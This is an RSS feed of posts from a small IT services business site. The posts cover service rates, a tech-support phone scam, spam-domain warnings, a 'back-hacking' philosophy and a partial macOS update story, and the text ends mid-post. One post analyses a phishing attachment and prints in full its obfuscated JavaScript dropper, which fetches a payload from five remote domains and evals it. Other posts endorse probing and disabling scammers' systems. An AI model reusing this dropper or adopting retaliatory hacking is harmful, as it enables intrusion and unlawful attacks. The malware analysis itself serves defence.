happycattech.com - Satisfied customers are the Cat's Meow! http://happycattech.com/index.php/rss.xml en Client Services Available http://happycattech.com/index.php/client-services-available <span class="field field--name-title field--type-string field--label-hidden">Client Services Available</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><a href="http://happycattech.com/" target="_self">Happy Cat Technologies</a> provides the following services to clients in the <u>Fort Collins/Loveland and local areas only</u>:</p> <ul><li>Computer maintenance, such as dust-out/cleaning, removing unwanted pre-installed applications, installing/upgrading applications, removing malware and viruses, creation of emergency boot disks, optimizing (<em>speed up</em>), diagnostic troubleshooting, etc. We support Windows (<em>7-10</em>), OS-X, and Linux operating systems. Service on smart phones or tablets based on the Android OS is also available depending on model. Service on Apple smart phones and tablets is not available due to Apple product policies.</li> <li>Tower and laptop hardware servicing including hardware installation, upgrading, troubleshooting, and defective component replacement. Limited Apple laptop hardware support is provided due to Apple product policies.</li> <li style="margin-bottom: 0in">Data Recovery and Backup, to mitigate disaster situations, such as when the operating system won't start. We also provide password recovery for some versions of Windows. We can recommend and set up backups to local media (DVD), removable media (flash drive, external hard drive), or to the Cloud (<a href="https://www.sosonlinebackup.com/" target="_blank">SOS Backup</a>, <a href="https://www.carbonite.com/" target="_blank">Carbonite</a>, etc.).</li> <li style="margin-bottom: 0in">Network/WIFI consultation, design, installation, configuration and troubleshooting, including cable routing. 
We also do security evaluations of WIFI installations.</li> <li>Web site<sup>[<a href="http://happycattech.com/client-services-available/#websites">1</a>]</sup> provisioning from initial consultation to development, <!--break-->deployment, and administration, including <a href="https://www.drupal.org/" target="_blank">Drupal</a> / <a href="https://wordpress.org/" target="_blank">WordPress</a> Content Management Systems (CMS).</li> <li>Search Engine Optimization (SEO).</li> <li>Server installation, configuration, and troubleshooting for email and web site servers such as <a href="http://httpd.apache.org/" target="_blank">Apache</a>. We also perform <a href="http://www.mysql.com/" target="_blank">mySQL</a> and Microsoft Access database configuration, deployment, administration, and development, including custom query/report creation, query/report debugging, and verification.</li> <li>Application design in PHP, Java, JavaScript, C++, and other programming languages. We have the capability to create new applications for you or to modify/debug old applications if the original source code is available.</li> <li>IT security consultation, penetration testing, and digital forensics.</li> <li>Electronics Engineering capability, including design, simulation, PCB generation, verification, and characterization.</li> <li>Training in applications, operation/administration on Windows (<em>7-10</em>), OS-X, Linux, iOS and Android. This includes Word Processing, Spreadsheets, Email, Graphics, and more.</li> <li>Customer support and advice are always free! We want you to be a happy, satisfied customer. 
There is a <u><em><strong><span class="green">50% discount</span></strong></em></u> on first service calls for all new clients.</li> </ul><p><strong>Please call for a <span class="green">free estimate</span>: 970.297.8490</strong></p> <p><em>Our rates are fair and competitive, with a one year warranty on all service performed, excepting hardware</em><sup>[<a href="http://happycattech.com/client-services-available/#hwdwarantee">2</a>]</sup>.<br /><small><strong>Service rate is $45.00/hour other than training.</strong></small><br /><small><strong>Residential and Training rate is $30.00/hour; more than one individual welcome for training.</strong></small></p> <p><a name="websites" id="websites"></a><sup>[1]</sup>Happy Cat Technologies only provides website development on Linux/Unix hosted sites. Due to the nature of website development and the time involved, websites are contracted on a per-site basis. Websites range from $300 for a flat website to around $2500-$3500 for fully functional e-Commerce WordPress or Drupal sites. Business logo development, research and/or extensive graphic generation are billed at the service rate of $45.00/hour. Website updates not involving JavaScript or PHP programming are billed at the rate of $20/hour. Please call for details.</p> <p>Hosting/Domain Name Registration support may be provided for clients at the hosting provider/registrar of their choice or at Happy Cat Technologies' preferred hosting provider/registrar, <a href="https://www.godaddy.com/" target="_blank">GoDaddy</a>.</p> <p><a name="hwdwarantee" id="hwdwarantee"></a><sup>[2]</sup>New hardware <u>installation</u> is warrantied for a period of one year. Installed hardware is warrantied under the terms of the warranty provided by the vendor/manufacturer of the hardware. 
Hardware repaired by Happy Cat Technologies is warrantied for a period of ninety (90) days.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Thu, 12/01/2016 - 13:09</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/75" hreflang="en">Client</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/76" hreflang="en">Services</a></div> </div> </div> Thu, 01 Dec 2016 20:09:57 +0000 AlReaud 49 at http://happycattech.com http://happycattech.com/index.php/client-services-available#comments Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof http://happycattech.com/index.php/hacker-mitigation/ups-pacel-shipping-problem-spoof <span class="field field--name-title field--type-string field--label-hidden">Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>At least once a week I get attachments from a “reputable” organization saying my account (<span class="poop">that I don't have</span>) has been locked due to suspicious activity being detected, a bank account (<span class="poop">that I don't have</span>) needs verification, or there is a problem with the shipment of a parcel (<span class="poop">I didn't order</span>). This week I got an interesting one from "<em>Jordan Mccabe, UPS Station Manager</em>". 
Sadly, the sender doesn't know enough about the target to realize that "UPS" and "Post Office", well, kind of mismatch. But this one got me interested in doing some reverse engineering of the suspicious attachment because of its small size, only 817 bytes.</p> <p>The text of the email is as follows:<br /><strong>Date:</strong> 02/26/2017 01:35 AM<br /><strong>From:</strong> virtual-user &lt;<a href="mailto:webmaster@lippocastano.it">webmaster@lippocastano.it</a>&gt;<br /><strong>Subject:</strong> Parcel #001210497 shipment problem, please review<br /><strong>To:</strong> Me<br /><strong>Body:</strong></p> <blockquote> <pre wrap=""> Dear Customer, Your item has arrived at the UPS Post Office at February 25, but the courier was unable to deliver parcel to you. Postal label is enclosed to this e-mail. Please check the attachment! Yours sincerely, Jordan Mccabe, UPS Station Manager. </pre> </blockquote> <p><strong>Attachment:</strong> UPS-Parcel-ID-001210497.zip<br /><strong>Attachment Checksum (MD5):</strong> 3e01923b9fd179c864bf40caffb21786</p> <img alt="Screen capture of UPS Trojan Attachment Email showing highlights." data-entity-type="file" data-entity-uuid="c99346fc-3b19-4db0-a151-4a6d999ca8ab" src="/sites/hctc/files/inline-images/UPS%20Trojan%20Attachment%20Email.png" class="align-center" /><p>The highlighted areas are the ones that commonly give away the fact that it is a spoof. Usually the sender address is strange or wrong, the grammar is wrong, and the context of the message is wrong.</p> <p>Unzipping the attachment creates a second zip file with a<!--break--> <em>.doc.zip</em> extension (<em>Microsoft Word Document.Compressed File</em>) that is 694 bytes long. 
Most Windows installations will show this as a <em>.doc</em> file rather than with its true extension, which is <em>.zip</em>.<br /><strong>Unzipped Attachment:</strong> UPS-Parcel-ID-001210497.doc.zip<br /><strong>Unzipped Attachment Checksum (MD5):</strong> 6a6d2e478e7a2b0259f1fcc333e7cde3</p> <p>My interpretation is that if one were to double-click on that file in a File Explorer window, Windows would actually extract the compressed file and try to execute it with the associated software. But we are doing this on Ubuntu 16.04, so we have to do it manually and make some assumptions that may not be valid. We'll get to that later…</p> <p>Unzipping the compressed document file gives a third file with a .doc.js extension (Microsoft Word Document.JavaScript Source) that is, again, 817 bytes long. I believe that this JavaScript file would then be executed by the default browser on the system, which would normally be Microsoft Internet Explorer or, now, Microsoft Edge.<br /><strong>Unzipped Document File:</strong> UPS-Parcel-ID-001210497.doc.js<br /><strong>Unzipped Document File Checksum (MD5):</strong> f1bce6d06683909f54cefd27490c097d</p> <p>The content of this JavaScript installer is as follows. It is simply encoded in an attempt to defeat malware scanners. 
For simplicity I've removed blank lines:</p> <ol><li> <pre> var sder = "P";</pre> </li> <li> <pre> var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;</pre> </li> <li> <pre> var m = "rWsE9ZXQhmXt5qxjCNca4Tq-BPesvEn4nxd0LQzxeVXfY-N-QdlpNfbwmn7_EZjSl61XGNgm";</pre> </li> <li> <pre> var x = new Array("ronniespersonaltouchjanitorialservice.com", "lasvegasmaps.net", "fitnessdigezt.com", "lovingfloridalife.com", "gestionysuministros.com");</pre> </li> <li> <pre> var t4 = "ht"+"tp";</pre> </li> <li> <pre> var mul = "qwadro";</pre> </li> <li> <pre> var ter = "/";</pre> </li> <li> <pre> for (var i=0; i&lt;x.length; i++)</pre> </li> <li> <pre> { </pre> </li> <li> <pre> var vDJmB = function(){</pre> </li> <li> <pre> return new ActiveXObject(g2);</pre> </li> <li> <pre> }();</pre> </li> <li> <pre> var e = vDJmB;</pre> </li> <li> <pre> try</pre> </li> <li> <pre> { </pre> </li> <li> <pre> var guama=["\x6F\x70\x65\x6E"];e[guama[0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m,false) </pre> </li> <li> <pre> e.send();</pre> </li> <li> <pre> var r = e.responseText;</pre> </li> <li> <pre> if (r.length &gt; 999+1 &amp;&amp; r.indexOf(m) &gt; -1)</pre> </li> <li> <pre> {</pre> </li> <li> <pre> eval(e.responseText.split(m).join(mul.substring(2,3)));</pre> </li> <li> <pre> break;</pre> </li> <li> <pre> };</pre> </li> <li> <pre> }</pre> </li> <li> <pre> catch(e)</pre> </li> <li> <pre> {</pre> </li> <li> <pre> };</pre> </li> <li> <pre> };</pre> </li> </ol><p> </p> <p>The JavaScript goes out to five websites and downloads encoded preliminary payloads that are using something similar to <a href="https://en.wikipedia.org/wiki/Steganography" target="_blank">steganography</a> for obfuscation purposes. 
After configuring variables, the script creates an <a href="https://en.wikipedia.org/wiki/ActiveX" target="_blank">ActiveX</a> object, <strong>vDJmB</strong> (<em>line 10</em>), assigns it to a variable, <strong>e</strong> (<em>line 13</em>), then tries to open an HTTP request through the <a href="https://en.wikipedia.org/wiki/ActiveX" target="_blank">ActiveX</a> object with the parameters shown on <em>line 16</em>. The five sites listed for this version are in the array variable <strong>x</strong> (<em>line 4</em>), and the key is in the variable <strong>m</strong> (<em>line 3</em>). If successful, the script assigns the response to a variable, <strong>r</strong> (<em>line 18</em>), checks its size, and then evaluates the decoded primary payload (<em>line 21</em>), which is also JavaScript.</p> <p><span class="warning">TO BE CONTINUED…</span></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Tue, 02/28/2017 - 19:26</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/21" hreflang="en">Hacker</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/23" hreflang="en">Mitigation</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/56" hreflang="en">Email Phishing</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/90" hreflang="en">Trojan Installers</a></div> </div> </div> Wed, 01 Mar 2017 02:26:26 +0000 AlReaud 58 at http://happycattech.com http://happycattech.com/index.php/hacker-mitigation/ups-pacel-shipping-problem-spoof#comments 
Beware the www.support.me phone scam... http://happycattech.com/index.php/hacker-mitigation/beware-www-support-me-phone-scam <span class="field field--name-title field--type-string field--label-hidden">Beware the www.support.me phone scam...</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I got a call from <strong>(212) 877-1620</strong>, which is a Verizon New York number, on Friday, February 24, 2017. This number had been trying to reach me almost daily since February 14. It must have been an important call if they were doing that, so I answered. The guy on the other end of the line was from a "<span class="poop">Microsoft Certified support provider</span>" (<em><span class="saddle">Right</span> </em><img alt="frown" height="23" src="/libraries/smiley/images/confused_smile.png" title="frown" width="23" />) who wanted to let me know that <span class="poop">they had detected my Windows computer putting out malware</span>. <span class="royal">Really? Which computer?</span> I have four computers up and running. <span class="poop">Oh, the one you are on now.</span> <span class="royal">That's pretty interesting,</span> I told him, <span class="royal">the computer was powered down.</span> <span class="poop">Oh, we have logs of it,</span> he said. He had one of those Mumbai British accents that lets the cat jump right out of the bag, if you know what I mean…</p> <p>The truth of the matter is that I have ZERO computers that have Windows on them; I only run versions of Linux. <img alt="wink" height="23" src="/libraries/smiley/images/wink_smile.png" title="wink" width="23" /> So I started feeding him line and slowly reeling him in. I was able to troll him for about 17 minutes (<em>You want to keep them on the line as long as possible, as it cuts down their effectiveness</em>). We get started right away, as <span class="poop">he tells me it's a critical problem, and it has to be fixed right away.</span> Sure, right! 
<span class="poop">Let's try to open the command prompt by running Windows-Key+R</span>. <span class="royal">Doesn't work. No command prompt shows up.</span> <span class="royal">Should I be doing a capital "R"?</span> <span class="poop">No, just Windows-Key+R</span>. So we go through a few permutations of opening the command prompt in Windows. Doesn't work.</p> <p><span class="poop">OK, could you open Internet Explorer?</span> <span class="royal">How?</span> Spend a few minutes on that. <span class="royal">No, can't do that either.</span> <span class="poop">How about some other browser?</span> <span class="royal">Sure, I have Firefox. OK, that works</span> (<em>because I'm looking for a website address, LOL</em>). OK, so he sends me to <a href="http://www.support.me" target="_blank">http://www.support.me</a>, which immediately redirects me<!--break--> to <a href="https://secure.logmeinrescue.com/Customer/Code.aspx" target="_blank">https://secure.logmeinrescue.com/Customer/Code.aspx</a>. Then he gives me a code, something like "888BCA6000C04FD7062". He was very specific about the 888, though, and I messed around with the numbers to verify that the first three digits were the important ones. Well, the support code doesn't download anything, because I have a locked-down browser that won't run scripts, and the system won't run any .exe either, because it isn't Windows. We're about 15 minutes into the gig now, and he's getting frustrated. He gets his supervisor on the phone, with an authoritative, no-nonsense Mumbai British accent. And he's getting pissed almost immediately. After a couple more minutes, he asks me: <span class="poop">What do you use your computer for?</span> <span class="royal">I use it for back-hacking.</span> <span class="poop">Back-hacking?</span> <span class="royal">Yes, I run an IT business and I hack in reverse, i.e. 
I go after scammers and spammers and try to penetrate and disable their systems...</span> <span class="poop">Oh, you're an IT guy like us, so why did I waste their time...</span> He hung up. Because <em><u><strong>I'M NOT AN IT GUY LIKE THEM</strong></u></em>!</p> <p>The gist of this is: <span class="emergency">never, ever</span> allow somebody remote access to your computer off of a cold call. Legitimate outfits will not be calling you up to offer malware removal. Especially not Microsoft. <a href="https://secure.logmein.com/home" target="_blank">LogMeIn</a> is a <u>legitimate outfit</u>, but there are individuals abusing the system, just like they do with everything else. <a href="https://secure.logmein.com/home" target="_blank">LogMeIn</a> provides a page, <a href="http://help.logmein.com/articles/en_US/FAQ/Avoiding-scammers-who-abuse-LogMeIn-Rescue-trial-accounts" target="_blank">Avoiding scammers who abuse LogMeIn Rescue trial accounts</a>, as a guide to how to address the issue. Be safe, and pay attention to how the interaction begins, what is being asked, and why you need to cooperate with the caller. <u>A request to call back is</u> <span class="emergency">very important</span> on your part, because usually the number that they called from is not real. They are doing a <a href="https://en.wikipedia.org/wiki/Voice_over_IP" target="_blank">VoIP</a> call from a sweatshop overseas and spoofing the calling number. 
When I called back, the number was not in service!</p> <p>Safe and secure computing, folks!</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Sun, 02/26/2017 - 19:48</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/21" hreflang="en">Hacker</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/23" hreflang="en">Mitigation</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/88" hreflang="en">Phone Phishing</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/89" hreflang="en">Support.Me</a></div> </div> </div> Mon, 27 Feb 2017 02:48:32 +0000 AlReaud 57 at http://happycattech.com http://happycattech.com/index.php/hacker-mitigation/beware-www-support-me-phone-scam#comments Back-Hacker Blog http://happycattech.com/index.php/backhacker-blog <span class="field field--name-title field--type-string field--label-hidden">Back-Hacker Blog</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>The <a href="http://www.forbes.com/sites/patricklin/2016/09/26/forget-about-law-and-ethics-is-hacking-back-even-effective/" target="_blank">Back-Hacking</a> Blog came into existence around December 2011, after I started using <a href="https://www.kali.org/" target="_blank">Kali Linux</a>. It comes from the idea of defending against hackers in a manner similar to <a href="http://www.kravmagaloveland.com/" target="_blank">Krav Maga</a>. 
The putative system or security administrator doesn't just sit there passively receiving attacks; rather, in the background they start probing the intruder's system, looking for weaknesses and exploits and using all of the tools available. However, make sure you read that first <a href="http://www.bankinfosecurity.com/interviews/legal-merits-hack-back-strategy-i-1729" target="_blank">Back-Hacking</a> link (<em>and this one</em>). There are legal, ethical and logistical questions to be addressed. It can be quite effective, as related in <a href="http://happycattech.com/hacker-mitigation/suntrust-spoof" target="_blank">SunTrust Spoof: Additional ways of protecting your SunTrust access</a>. The other side of the coin is that it is not for the uninitiated. You may compromise your systems, open yourself or your organization to legal liability or criminal prosecution depending on your jurisdiction, and/or straight up waste your time. My <em>personal</em> position is that it is like carrying a concealed weapon, to be used only justifiably in self-defense.<!--break--></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Sun, 11/13/2016 - 14:17</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/24" hreflang="en">Back-Hacking</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/21" hreflang="en">Hacker</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/63" hreflang="en">Defense</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/23" hreflang="en">Mitigation</a></div> </div> </div> Sun, 13 Nov 2016 21:17:49 +0000 AlReaud 40 at http://happycattech.com http://happycattech.com/index.php/backhacker-blog#comments Hitting the nail on the head... http://happycattech.com/index.php/hitting-the-nail-on-the-head <span class="field field--name-title field--type-string field--label-hidden">Hitting the nail on the head...</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Since publishing the article “<a href="http://happycattech.com/beware-scam-email-top-stream-download" target="_blank">Beware those scam emails from .top, .stream and .download domains</a>” I must have pissed somebody off by giving some good advice. Since then I've been literally inundated with spam emails from the domains .top, .stream, .download and .win. When I cleared the junk filters out, I had almost 800 junk emails for the week of Sunday, October 23 - Saturday, October 29, 2016. This week the count is at 132 so far (<span class="poop"><em>see image below</em></span>)! That previous weekly total is more than I usually get in a month. Further, I've had some idiot with an email address something like <span class="poop">dhawalnator[at]gmail.com</span> emailing Toyota and Hyundai dealerships in San Jose, Fresno, and other cities in California, giving my phone number and saying that I'm interested in a vehicle. Actually, it's kind of funny, because I answer the calls and tell them that they are sadly the victims of a retaliatory email scam. That went on all last week. I need one of those dealerships to forward that email to <a href="mailto:alreaud@happycattech.com">alreaud[at]happycattech.com</a> so I can analyze it.</p> <p>This leads me to believe that I gave out good advice that is effective in preventing email phishers/scammers from being successful. 
So I'll give y'all another piece of advice, gratis. Use the <a href="https://www.mozilla.org/en-US/thunderbird/" target="_blank">Thunderbird email browser</a>. It has one of the best<!--break--> trainable spam filters, and it supports custom filters that let you catch all the .top, .stream, .download and .win domain spam emails, mark them as junk, and delete them before they get to your inbox. It's working like a champ for me, and each day I get more junk to train the spam filter to be a genius at trapping spam.</p> <p>Continue on, folks, whoever you are. Like the <a href="http://www.digitalattackmap.com/understanding-ddos/" target="_blank">DDoS attack</a> on <a href="http://krebsonsecurity.com/" target="_blank">Krebs on Security</a>, when you get the attention of the <a href="https://en.wikipedia.org/wiki/Black_hat" target="_blank">black-hats</a> you know that you are on the right track! <img alt="cheeky" height="23" src="/libraries/smiley/images/tongue_smile.png" title="cheeky" width="23" /></p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Mon, 10/31/2016 - 18:33</span> <div class="field field--name-field-image field--type-image field--label-above"> <div class="field__label">Image</div> <div class="field__item"> <img src="/sites/hctc/files/2016-10/Screenshot-spam-email_20161031-193616.png" width="622" height="480" alt="Spam email sample for 10-31-2016" typeof="foaf:Image" /> </div> </div> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/24" hreflang="en">Back-Hacking</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/25" hreflang="en">Email Spam</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/50" hreflang="en">Retaliation</a></div> </div> </div> Tue, 01 Nov 2016 00:33:06 +0000 AlReaud 33 at http://happycattech.com http://happycattech.com/index.php/hitting-the-nail-on-the-head#comments Beware those scam emails from .top, .stream and .download domains http://happycattech.com/index.php/beware-scam-email-top-stream-download <span class="field field--name-title field--type-string field--label-hidden">Beware those scam emails from .top, .stream and .download domains</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Since the advent of the .top, .stream, and .download domains there has been a plethora of new spam emails flooding the Internet. This is the result of the cheap hosting accounts available from many providers. Hosting providers have no incentive, however, to stop this, because they are making money from hosting questionable accounts, and there are <a href="https://askleo.com/stopping-spam-harder-think/" target="_blank">technical and legal challenges</a> to stopping spam.</p> <p>Spotting the scam emails is pretty easy; they usually come from strange addresses ending in <strong>.top, .stream, or .download</strong>, but can be from other domains, with entreaties to protect children, etc. Usually, but not always, the emails <u>contain only images</u>, and the links are very ephemeral. The most important thing you can do to protect yourself from these is to <a href="https://www.google.com/search?client=ubuntu&amp;channel=fs&amp;q=disabling+remote+content+on+email+browsers" target="_blank">DISABLE REMOTE CONTENT (<em>Google your specific email browser to get the information on how to do so</em>)</a>. 
The next most important thing, other than marking them as spam and deleting them immediately, is to set filters that mark and delete email from .top, .stream, and .download domains.</p> <p>By disabling remote content, the image that is usually enclosed in the spam email isn't downloaded. That prevents the compromised server these things redirect to from learning that your email address is valid and being read. It can do so because, as seen below, the embedded links in the email carry a unique signature that is associated with your email address.</p> <p>Five examples are (<em>redirects were followed using the text-only browser <a href="http://lynx.browser.org/" target="_blank">Lynx</a>, with <a href="https://www.wireshark.org/" target="_blank">Wireshark</a> for packet capture; <span class="emergency">PLEASE DON'T FOLLOW ANY OF THE LINKS BELOW UNLESS YOU ABSOLUTELY KNOW WHAT YOU ARE DOING!</span></em>):<!--break--></p> <ul><li><strong>From:</strong> Medical Alert Alarms &lt;<a href="mailto:MedicalAlertAlarms@tennantly.stream">MedicalAlertAlarms@tennantly.stream</a>&gt; <em><strong>10/3/2016 03:10 PM</strong></em><br /><strong>Subject:</strong> Get The Protection Your Family Need <em>(<span class="warning">notice the incorrect grammar</span>)</em><br /><strong>Email Link:</strong> <a href="http://www.tennantly.stream/l/lt9U29235X1227E/1428A7800LH42140XO1109G195871823A1091728285">http://www.tennantly.stream/l/lt9U29235X1227E/1428A7800LH42140XO1109G19…</a><br /><strong>Redirects to:</strong> &lt;hidden link&gt; <a href="http://www.tennantly.stream/tr9/14/29235/7800/42140/1109/195871823/index.htm">http://www.tennantly.stream/tr9/14/29235/7800/42140/1109/195871823/inde…</a><br /><strong>IP:</strong><br /><em>Only works once, because the link is ID-encoded. 
After the first use you get Yahoo.com, YouTube.com, etc. Pretty smart, to prevent backhacking…</em></li> <li><strong>From:</strong> Alaska    Cruises &lt;<a href="mailto:AlaskaCruises@vaudevilledj.stream">AlaskaCruises@vaudevilledj.stream</a>&gt; <em><strong>10/3/2016 08:16 AM</strong></em><br /><strong>Subject:</strong> Compare Amazing Alaska - Cruises - Deals.. <em>(<span class="warning">notice extra spaces, typos, incorrect grammar</span>)</em><br /><strong>Email Link:</strong> <a href="http://www.vaudevilledj.stream/l/lt468D39418JN1832L/1879NO11928L241797IU905U147850838W3487181010">http://www.vaudevilledj.stream/l/lt468D39418JN1832L/1879NO11928L241797I…</a><br /><strong>Redirects to:</strong> <a href="http://www.vaudevilledj.stream/tr13/9/39418/11928/241797/905/147850838/index.htm">http://www.vaudevilledj.stream/tr13/9/39418/11928/241797/905/147850838/…</a><br /><strong>IP:</strong><br /><em>Another link that only works once. Sends you to Lycos, Microsoft.com, etc., after the first try.</em></li> <li><strong>From:</strong> Harp-Approval-Partner &lt;<a href="mailto:Harp-Approval-Partner@huugiol4.peadiao.top">Harp-Approval-Partner@huugiol4.peadiao.top</a>&gt; <em><strong>09/25/2016 09:47 AM</strong></em><br /><strong>Subject:</strong> HARP Extended into 2016. 
Qualify To Save On Your Mortgage<br /><strong>Email Link:</strong> <a href="http://checkitout.peadiao.top/u/10116053">http://checkitout.peadiao.top/u/10116053</a><br /><strong>Redirects to:</strong> <a href="http://www.flowared.com/98cHPNJ8lNFIrRTYF47sK-s3oV7JTJEb3dX4L6tRXvY2gJ30tFpuaNpjvprK6fLsJIGdHs3ZxWZkEYVZgrsC8g~~/need0925-j15t">http://www.flowared.com/98cHPNJ8lNFIrRTYF47sK-s3oV7JTJEb3dX4L6tRXvY2gJ3…</a><br /><strong>IP:</strong> <strong>Result:</strong> Page not found, already taken down.<br /><em>As can be seen, from the link sent, you are uniquely identified…</em></li> <li><strong>From:</strong> Private Jet Rentals Specials &lt;<a href="mailto:Private.Jet.Rentals.Specials@efieu6a.ouchail.top">Private.Jet.Rentals.Specials@efieu6a.ouchail.top</a>&gt; <em><strong>09/17/2016 05:59 AM</strong></em><br /><strong>Subject:</strong> Private Jet Rentals are more affordable than you thought<br /><strong>Email Link:</strong> <a href="http://checkitout.ouchail.top/clickhere     &amp;nbsp">http://checkitout.ouchail.top/clickhere     &amp;nbsp</a>; <strong>IP:</strong><br /><strong>Redirects to:</strong>  <a href="http://privatejetrental.space/?acqsrc=MTk3MjgyMTM5ODYzODE4OO0kxjof%2FyawwLYKdHoY8J7EZfV%2BaUwERGJcyquphCoc">http://privatejetrental.space/?acqsrc=MTk3MjgyMTM5ODYzODE4OO0kxjof%2Fya…</a><br /><strong>IP:</strong> in Germany. 
<strong>Result:</strong> Error 400 Bad Request.<br /><em>Again, uniquely identifies you…</em></li> <li><strong>From:</strong> Making Children Safe &lt;<a href="mailto:making.children.safe@atechpk.com">making.children.safe@atechpk.com</a>&gt; <em><strong>10/3/2016 03:00 PM</strong></em><br /><strong>Subject:</strong> Put this watch on your child's wrist and GPS track them with 2/way calling and alert if remove attempted.<br /><strong>Email Link:</strong> <a href="http://www.atechpk.com/&amp;nbsp">http://www.atechpk.com/&amp;nbsp</a>; <a href="http://kids.atechpk.com/">http://kids.atechpk.com/</a> <strong>IP:</strong><br /><strong>Redirects to:</strong> <a href="http://decallium.com/0/0/0/b93d790c442809f00d8530ca129ff4a4/uh66">http://decallium.com/0/0/0/b93d790c442809f00d8530ca129ff4a4/uh66</a><br /><strong>IP:</strong><br /><strong>Further Redirect (as JavaScript):</strong> &lt;script type="text/javascript"&gt;window.location.href="<a href="http://fwd.trustedredirect.net/ts481-international-general.com">http://fwd.trustedredirect.net/ts481-international-general.com</a>"&lt;/script&gt;<br /><em>But Lynx won't follow those, so we end here!</em></li> </ul><p>I'm waiting for my count of suspicious spam email to reach 100, then we're going to do some mapping to see who owns these sites and domains, who the hosting providers are, what the IP addresses and countries are, etc. There is a need to find out the commonalities between them to be able to effectively fight this scourge of the Internet. 
Safe emailing, folks!</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Mon, 10/03/2016 - 17:43</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/24" hreflang="en">Back-Hacking</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/25" hreflang="en">Email Spam</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/26" hreflang="en">Phishing</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/27" hreflang="en">Spoofs</a></div> </div> </div> Mon, 03 Oct 2016 23:43:54 +0000 AlReaud 19 at http://happycattech.com http://happycattech.com/index.php/beware-scam-email-top-stream-download#comments Geek Thought of the Day Archive http://happycattech.com/index.php/book/geek-thought-day-archive <span class="field field--name-title field--type-string field--label-hidden">Geek Thought of the Day Archive</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>After seeing so many excellent thoughts of the day disappear into the aether, we thought that maybe it's a good idea to archive them. These all come from the Linux application <a href="https://en.wikipedia.org/wiki/Fortune_(Unix)">fortune-mod</a>, selected for (<em>mostly</em>) geek fortunes. As we enter a new fortune, we'll put the ones being replaced here as entries. These will be placed in year, month and day order as the number of archived entries increases. 
We don't always follow this rule, so please bear with us…</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Thu, 09/15/2016 - 17:20</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/9" hreflang="en">GTOTD</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/10" hreflang="en">fortune-mod</a></div> </div> </div> Thu, 15 Sep 2016 23:20:59 +0000 AlReaud 7 at http://happycattech.com http://happycattech.com/index.php/book/geek-thought-day-archive#comments Free Maverick update NOT recommended... http://happycattech.com/index.php/maverick-update-not-recommended <span class="field field--name-title field--type-string field--label-hidden">Free Maverick update NOT recommended...</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Recently, I had the dubious pleasure of updating a friend's MacBook from OS X 10.6.8 to 10.9. It started as normal, with a backup to DVD of all data that my friend couldn't afford to lose, such as pictures, documents, etc. Normal SOP for significant OS updates.</p> <p>After that, the update was started. First off, we had to figure out what the Apple ID and password were. That took a bit of time, but we finally found the piece of paper with the critical information. Once we started the update the real fun started. First off, we only had a 500KBS connection. That translates to an approximately 3-hour download. <u>You get what you pay for</u>, LOL. 
